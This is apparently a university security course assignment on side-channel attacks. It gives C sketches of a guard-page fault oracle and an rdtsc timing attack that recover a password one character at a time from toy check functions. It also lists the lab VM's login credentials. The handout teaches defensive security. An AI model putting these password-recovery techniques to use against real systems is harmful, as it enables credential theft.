PA2: Side Channel Attacks Spring 2022
Due: Thursday, April 28 at 11:59pm
This is a group project; you can work in a team of size at most two and submit one project per team. You are not required to work with the same partner on every project. You and your partner should collaborate closely on each part.
You have two late days that you may use to turn in work past the deadline over the entire quarter. A late day is a contiguous 24-hour period. Both you and your partner will be charged for every late day that you use, and you both must have late days to use them. These late days are intended to cover your extension needs for usual circumstances: brief illness, busy with other classes, interviews, travel, extracurricular conflicts, and so on. You do not need to ask permission to use a late day.
The code and other answers you submit must be entirely your team's own work. You may discuss the conceptualization of the project and the meaning of the questions, but you may not look at any part of someone else’s solution or collaborate with anyone other than your partner. You may consult published references, provided that you appropriately cite them (e.g., with program comments).
Solutions must be submitted to Gradescope.
Introduction
The goal of this assignment is to gain hands-on experience exploiting side channels. This assignment will demonstrate how side channels can be just as dangerous as the control flow vulnerabilities you exploited in PA 1.
You will be provided two skeleton files (memhack.c and timehack.c) that you will use to exploit side channels present in a target library (sysapp.c) to obtain a protected key. You may consult any online references you wish. You must document the sources you used in your solutions, for example with program comments. Failure to do so will be considered a violation of the academic integrity policy.
Read this First
This project asks you to develop attacks and test them in a virtual machine you control. Attempting the same kinds of attacks against others’ systems without authorization is prohibited by law and university policies and may result in fines, expulsion, and jail time. You must not attack anyone else’s system without authorization! You are required to respect the privacy and property rights of others at all times, or else you will fail the course.
Alice's company, Security4All, has noticed a possible breach of user passwords. Alice wants to figure out whether the breach really happened. A breach would be very bad news for Alice and could seriously damage the company's reputation. Alice would be grateful for your assistance in developing exploits to verify whether passwords can indeed be breached using side channel attacks.
Getting Started
Just like PA1, for this assignment you will be provided with a VirtualBox VM containing all the files you need. You can download the VM image here. As in PA1, download CSE127-PA2-VBOX.zip if VirtualBox is compatible with your machine; download CSE127-PA2-UTM.zip if you are using an M1 Mac (Intel Macs can use either VM software).
Make sure to import the pa2box.vbox file into VirtualBox via the Machine → Add menu item. Do not create a brand-new VirtualBox VM or import the pa2box-data.vmdk file on its own; if you do, you won't have the correct configuration.
The VM is configured with two users: student, with password hacktheplanet; and root, with password hackallthethings. We recommend you use the VM via ssh and scp, just like previous assignments. Please note that SSH is disabled for root, so you can only SSH in as the student user.
SSH is listening on port 2222, i.e.
ssh -p 2222 student@localhost
You can still log in as root using su or by logging into the VM directly, i.e.
student@CSE127:~$ su root
You can redownload the starter code here.
Assignment Files
Starter files are included inside the student user's home directory within the VM image.
There are two parts to this assignment, each with its own subdirectory, memhack and timehack. Each subdirectory contains exploit starter code (memhack.c or timehack.c), which imports a library (sysapp.c, with the same contents across the two subdirectories) with password-checking functionality vulnerable to side-channel attacks. You should not modify sysapp.c, only memhack.c and timehack.c. Each subdirectory contains a Makefile for building your exploits, i.e., run make (or make clean if desired).
Assignment Instructions
You will be writing two exploits, each of which takes advantage of a side channel, to obtain the password in sysapp.c. In memhack.c, you will exploit a memory-based side channel, and in timehack.c you will exploit a timing-based side channel. See the Exploit Construction section for specific details. Once both of your exploits can determine the password stored in correct_pass in sysapp.c and call the hack_system() function successfully, the assignment is complete.
Submitting Your Solutions
Submit memhack.c and timehack.c to the PA2: Side Channel Attacks assignment on Gradescope.
The score that you receive on Gradescope is NOT your final grade for the PA, so please make sure that you test your code thoroughly.
Grading
We will randomize the contents of the correct_pass variable, and we expect your memhack.c and timehack.c to correctly determine the password.
Each attack is worth 10 points.
To summarize, the points will be allocated as follows:
- 10 points for the memory-based side channel exploit
- 10 points for the timing-based side channel exploit
Exploit Construction
Memory-Based Side Channel
We recommend you start with the memory-based side channel because it is deterministic and doesn't have problems with noise. Look at the check_pass() function in sysapp.c and note two things:
- The password string is passed by reference
- The memory it points to is checked against the reference password one character at a time.
Now look in memhack.c and note how a buffer is allocated such that the page starting at page_start is protected (i.e., accessing it will cause a segmentation fault, or SEGV) and the preceding 32 characters are allocated.
Now look at the demonstration function demonstrate_signals(), which shows how referencing any memory in the protected page will produce a fault. Also observe how the function catches that fault. You do not need to use this function; it is merely there to show you how to use signals to capture whether a memory reference touched a page or not.
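The idea of catching a fault to learn whether a read touched a protected page can be sketched as follows. This is a minimal, hedged illustration and not the code in memhack.c: the names on_fault, read_faults, make_guarded_buffer, and install_fault_handler are hypothetical, and the sketch assumes a POSIX system with mmap and mprotect. It also handles SIGBUS, since some platforms report protection faults that way.

```c
#define _DEFAULT_SOURCE
#include <assert.h>
#include <setjmp.h>
#include <signal.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

static sigjmp_buf fault_env;   /* where the handler jumps back to */
static volatile char sink;     /* keeps the probe read from being optimized away */

/* Signal handler: abandon the faulting read and resume at sigsetjmp. */
static void on_fault(int sig) {
    (void)sig;
    siglongjmp(fault_env, 1);
}

/* Hypothetical helper: installs on_fault for SIGSEGV and SIGBUS. */
int install_fault_handler(void) {
    struct sigaction sa;
    memset(&sa, 0, sizeof sa);
    sa.sa_handler = on_fault;
    sigemptyset(&sa.sa_mask);
    if (sigaction(SIGSEGV, &sa, NULL) != 0) return -1;
    return sigaction(SIGBUS, &sa, NULL);
}

/* Hypothetical helper: maps two pages, protects the second one, and
 * returns a pointer to the start of the protected page (NULL on error). */
char *make_guarded_buffer(void) {
    long page = sysconf(_SC_PAGESIZE);
    assert(page > 0);
    char *buf = mmap(NULL, 2 * (size_t)page, PROT_READ | PROT_WRITE,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (buf == MAP_FAILED) return NULL;
    if (mprotect(buf + page, (size_t)page, PROT_NONE) != 0) return NULL;
    return buf + page;
}

/* Returns 1 if reading *p faults, 0 if the read succeeds.
 * sigsetjmp and the risky read live in the same function, so the
 * saved context is still valid when the handler jumps back. */
int read_faults(const volatile char *p) {
    if (sigsetjmp(fault_env, 1) == 0) {
        sink = *p;      /* may fault */
        return 0;       /* read completed normally */
    }
    return 1;           /* reached via siglongjmp from on_fault */
}
```

After calling install_fault_handler() and make_guarded_buffer(), a read one byte before the returned pointer should report 0 and a read at the pointer itself should report 1. Passing 1 as the second argument to sigsetjmp saves the signal mask, so the fault signal is unblocked again after each jump and the probe can be repeated.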
Now you will want to create a framework (in memhack.c) that calls check_pass() with different inputs and catches any resulting faults so you can determine if part of the password is correct. We suggest a loop over the maximum password size (32 characters). For the first guess, store the password so that its first character is one byte before page_start, then iterate over the possible choices for the first character. When you get it right, check_pass() moves on to the next character, which lies in the protected page, and you will get a page fault. Repeat this to guess the entire password. Note that all ASCII symbols from ASCII symbol 33 (!) to ASCII symbol 126 (~) can be used in the password.
Other hints:
- You are already given a page protected buffer with enough memory to crack the password. All you need to do is use it appropriately for each guess you make.
- The demonstrate_signals function handles all the segfaults for you. You can re-use almost all of it in your code.
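The guessing loop described above can be sketched end to end against a toy target. Everything here is an assumption made for illustration: toy_check and toy_secret are hypothetical stand-ins for the real library (whose check_pass() may differ in signature and behavior), and recover_secret and probe_faults are made-up names. The sketch only shows how sliding the guess toward the protected page turns a fault into a one-character oracle.

```c
#define _DEFAULT_SOURCE
#include <assert.h>
#include <setjmp.h>
#include <signal.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

#define MAX_LEN 32

static sigjmp_buf fault_env;
static volatile int sink;   /* keeps the toy_check call from being optimized away */

static void on_fault(int sig) {
    (void)sig;
    siglongjmp(fault_env, 1);
}

/* Hypothetical stand-in for the vulnerable routine: compares one byte
 * at a time and stops at the first mismatch. */
static const char *toy_secret = "s3cr3t!";
static int toy_check(const char *guess) {
    const char *s = toy_secret;
    for (;;) {
        if (*guess != *s) return 0;
        if (*s == '\0') return 1;
        guess++;
        s++;
    }
}

/* Returns 1 if toy_check read into the protected page, else 0.
 * sigsetjmp is called in the same function as the risky call. */
static int probe_faults(const char *guess) {
    if (sigsetjmp(fault_env, 1) == 0) {
        sink = toy_check(guess);
        return 0;
    }
    return 1;
}

/* Recovers the toy secret into out (needs MAX_LEN + 1 bytes).
 * Returns the recovered length, or -1 on setup failure. */
int recover_secret(char *out) {
    long page = sysconf(_SC_PAGESIZE);
    assert(page > MAX_LEN);
    char *buf = mmap(NULL, 2 * (size_t)page, PROT_READ | PROT_WRITE,
                     MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (buf == MAP_FAILED) return -1;
    char *page_start = buf + page;
    if (mprotect(page_start, (size_t)page, PROT_NONE) != 0) return -1;

    struct sigaction sa;
    memset(&sa, 0, sizeof sa);
    sa.sa_handler = on_fault;
    sigemptyset(&sa.sa_mask);
    if (sigaction(SIGSEGV, &sa, NULL) != 0) return -1;
    if (sigaction(SIGBUS, &sa, NULL) != 0) return -1;

    int len = 0;
    while (len < MAX_LEN) {
        /* Place the guess so its last character is the byte just
         * before the protected page. */
        char *guess = page_start - (len + 1);
        memcpy(guess, out, (size_t)len);
        int found = 0;
        for (int c = 33; c <= 126; c++) {
            guess[len] = (char)c;
            if (probe_faults(guess)) {   /* fault: character c matched */
                out[len] = (char)c;
                found = 1;
                break;
            }
        }
        if (!found) break;               /* no candidate faulted: end of secret */
        len++;
    }
    out[len] = '\0';

    signal(SIGSEGV, SIG_DFL);
    signal(SIGBUS, SIG_DFL);
    munmap(buf, 2 * (size_t)page);
    return len;
}
```

Each position costs at most 94 probes, so the total work grows linearly with the password length rather than exponentially. The loop ends when no printable character causes a fault, which in this toy setup means the secret's terminator has been reached.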
Note on sigsetjmp/siglongjmp
We highly advise reading the man pages for sigsetjmp/siglongjmp so you understand how they work.
One frequent pitfall students run into is calling sigsetjmp inside of a helper function, which can cause undefined behavior (especially when running on Gradescope).
An excerpt from man sigsetjmp:
If the function which called setjmp() returns before longjmp() is called, the behavior is undefined. Some kind of subtle or unsubtle chaos is sure to result.
Timing-Based Side Channel
Unlike the memory-based side channel, the timing-based side channel will deal with noise. Go back and look at check_pass(). An artificial delay has been added when each character is checked to make your life easier (it’s possible to do the assignment without it, but it would require a much more careful methodology). The execution time of check_pass() depends on how many characters you guess correctly.
Look in timehack.c and find the macro there named rdtsc(), which reads the processor's cycle counter (a clock that increments by one for each processor cycle that passes). In general, treat rdtsc() as a free-running timer that returns a long. Insert a call to rdtsc() before the call to check_pass() and another one after it. Print the difference between these values to see how long (in cycles) the password checking ran. Run the program a few times. Now change the guess string so the first character is correct. Run again and see how the time difference changes.
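A single timed measurement can be sketched as below. This is an illustration under stated assumptions, not the rdtsc() macro from timehack.c: now_ticks, elapsed_ticks, time_one_check, and the two-argument toy_check are hypothetical names. The sketch uses the compiler intrinsic __rdtsc() on x86 and falls back to a nanosecond clock on other architectures.

```c
#define _POSIX_C_SOURCE 200809L
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <time.h>
#if defined(__x86_64__) || defined(__i386__)
#include <x86intrin.h>
#endif

/* Reads a free-running counter: the cycle counter on x86, a
 * monotonic nanosecond clock elsewhere (fallback is an assumption). */
static uint64_t now_ticks(void) {
#if defined(__x86_64__) || defined(__i386__)
    return __rdtsc();
#else
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000000000u + (uint64_t)ts.tv_nsec;
#endif
}

/* Elapsed ticks between two readings. Unsigned subtraction stays
 * correct even if the counter wrapped once between them. */
uint64_t elapsed_ticks(uint64_t start, uint64_t end) {
    return end - start;
}

/* Hypothetical stand-in for the routine being timed: an early-exit
 * comparison with an artificial delay before each character check. */
static volatile unsigned spin_sink;
int toy_check(const char *guess, const char *secret) {
    for (size_t i = 0; ; i++) {
        for (unsigned k = 0; k < 2000; k++) spin_sink += k;  /* delay */
        if (guess[i] != secret[i]) return 0;
        if (secret[i] == '\0') return 1;
    }
}

/* Times one call to toy_check and returns the elapsed ticks. */
uint64_t time_one_check(const char *guess, const char *secret) {
    assert(guess != NULL && secret != NULL);
    uint64_t start = now_ticks();
    int ok = toy_check(guess, secret);
    uint64_t end = now_ticks();
    (void)ok;
    return elapsed_ticks(start, end);
}
```

With this toy target, a guess whose first character is correct passes through the delay loop at least twice instead of once, so its measured time should tend to be larger. Individual readings still vary from run to run.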
Now automate this entire process, in the style of the original approach in memhack.c. Note that unlike the memhack attack, the timehack problem will have to deal with noise. Depending on things like what other programs are running, the status of the cache, the contents of the branch target buffer, and so on, there can be significant variability in the amount of time each check takes. This will matter in practice. You will want to run a lot of trials before you reach your conclusion about each character.
Other hints:
- Be careful when using printf. Calls to it can blow out the instruction and data caches and perturb your results (i.e., overwhelm the timing effects you are trying to detect).
- Be careful when averaging across trials. If your process is descheduled in the middle of a measurement, the time cost of that individual trial will be so large that it overwhelms everything else. Instead, the median is your friend. However, feel free to experiment if something does not work for you.
- If time is not continuing to increase as you progress through characters, then you probably made a bad guess earlier. Backtrack.
- rdtsc() will wrap around at some point. You may need to handle this outlier if it is causing issues.
- Debugging advice: make a big array to hold your timing measurements and print them at the end.
- Be sure to test a bunch of different passwords. We will when we grade.
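The advice to prefer the median over the mean can be sketched with two small helpers. The names median_ticks and slowest_candidate are hypothetical. The sketch assumes you have already collected several timing samples per candidate character, and that the correct candidate is the one with the largest median time.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>

/* qsort comparator for uint64_t that avoids overflow from subtraction. */
static int cmp_u64(const void *a, const void *b) {
    uint64_t x = *(const uint64_t *)a;
    uint64_t y = *(const uint64_t *)b;
    return (x > y) - (x < y);
}

/* Sorts samples in place and returns the middle element (the upper
 * middle when n is even). One huge outlier does not move the result. */
uint64_t median_ticks(uint64_t *samples, size_t n) {
    assert(n > 0);
    qsort(samples, n, sizeof samples[0], cmp_u64);
    return samples[n / 2];
}

/* Returns the index of the largest median, i.e. the candidate whose
 * checks typically took longest. */
size_t slowest_candidate(const uint64_t *medians, size_t n) {
    assert(n > 0);
    size_t best = 0;
    for (size_t i = 1; i < n; i++) {
        if (medians[i] > medians[best]) best = i;
    }
    return best;
}
```

For example, the samples {5, 1, 1000000, 3, 4} have a median of 4, while their mean is above 200000 because of the single descheduled trial. Storing the samples in an array and processing them afterwards also keeps printf out of the measurement loop.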
Final Notes
Do not write a solution that simply checks all passwords exhaustively. You will not get credit for this. The timing side channel should be exploitable in linear time (we will stop programs that are running for excessive periods) and it will basically feel instantaneous for passwords of 8 characters or less (note we will not test passwords over 12 characters).